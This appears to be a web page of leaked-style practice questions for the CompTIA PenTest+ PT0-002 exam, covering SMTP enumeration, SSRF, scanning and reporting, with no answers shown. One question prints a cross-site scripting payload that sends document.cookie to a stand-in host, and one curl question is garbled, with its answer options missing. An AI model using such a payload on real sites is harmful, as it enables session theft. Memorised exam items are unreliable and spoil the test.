CompTIA PT0-002 CompTIA PenTest+ Certification Exam Online Training
CompTIA PT0-002 Online Training
The questions for PT0-002 were last updated at Mar 01,2025.
- Exam Code: PT0-002
- Exam Name: CompTIA PenTest+ Certification Exam
- Certification Provider: CompTIA
- Latest update: Mar 01,2025
A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.
Which of the following commands should be used to accomplish the goal?
- A . VRFY and EXPN
- B . VRFY and TURN
- C . EXPN and TURN
- D . RCPT TO and VRFY
Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?
- A . Executive summary of the penetration-testing methods used
- B . Bill of materials including supplies, subcontracts, and costs incurred during assessment
- C . Quantitative impact assessments given a successful software compromise
- D . Code context for instances of unsafe type-casting operations
A penetration tester performs the following command:
curl CI Chttp2 https://www.comptia.org
Which of the following snippets of output will the tester MOST likely receive?
- A . Option A
- B . Option B
- C . Option C
- D . Option D
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself.
Which of the following vulnerabilities has the tester exploited?
- A . Cross-site request forgery
- B . Server-side request forgery
- C . Remote file inclusion
- D . Local file inclusion
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks.
Which of the following methodologies should be used to BEST meet the client’s expectations?
- A . OWASP Top 10
- B . MITRE ATT&CK framework
- C . NIST Cybersecurity Framework
- D . The Diamond Model of Intrusion Analysis
Given the following code:
<SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SC
RIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
- A . Web-application firewall
- B . Parameterized queries
- C . Output encoding
- D . Session tokens
- E . Input validation
- F . Base64 encoding
A client evaluating a penetration testing company requests examples of its work.
Which of the following represents the BEST course of action for the penetration testers?
- A . Redact identifying information and provide a previous customer’s documentation.
- B . Allow the client to only view the information while in secure spaces.
- C . Determine which reports are no longer under a period of confidentiality.
- D . Provide raw output from penetration testing tools.
Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?
- A . Nessus
- B . Metasploit
- C . Burp Suite
- D . Ethercap
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?
- A . chmod u+x script.sh
- B . chmod u+e script.sh
- C . chmod o+e script.sh
- D . chmod o+x script.sh
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability.
Which of the following should the penetration tester consider BEFORE running a scan?
- A . The timing of the scan
- B . The bandwidth limitations
- C . The inventory of assets and versions
- D . The type of scan
Latest PT0-002 Dumps Valid Version with 110 Q&As
Latest And Valid Q&A | Instant Download | Once Fail, Full Refund
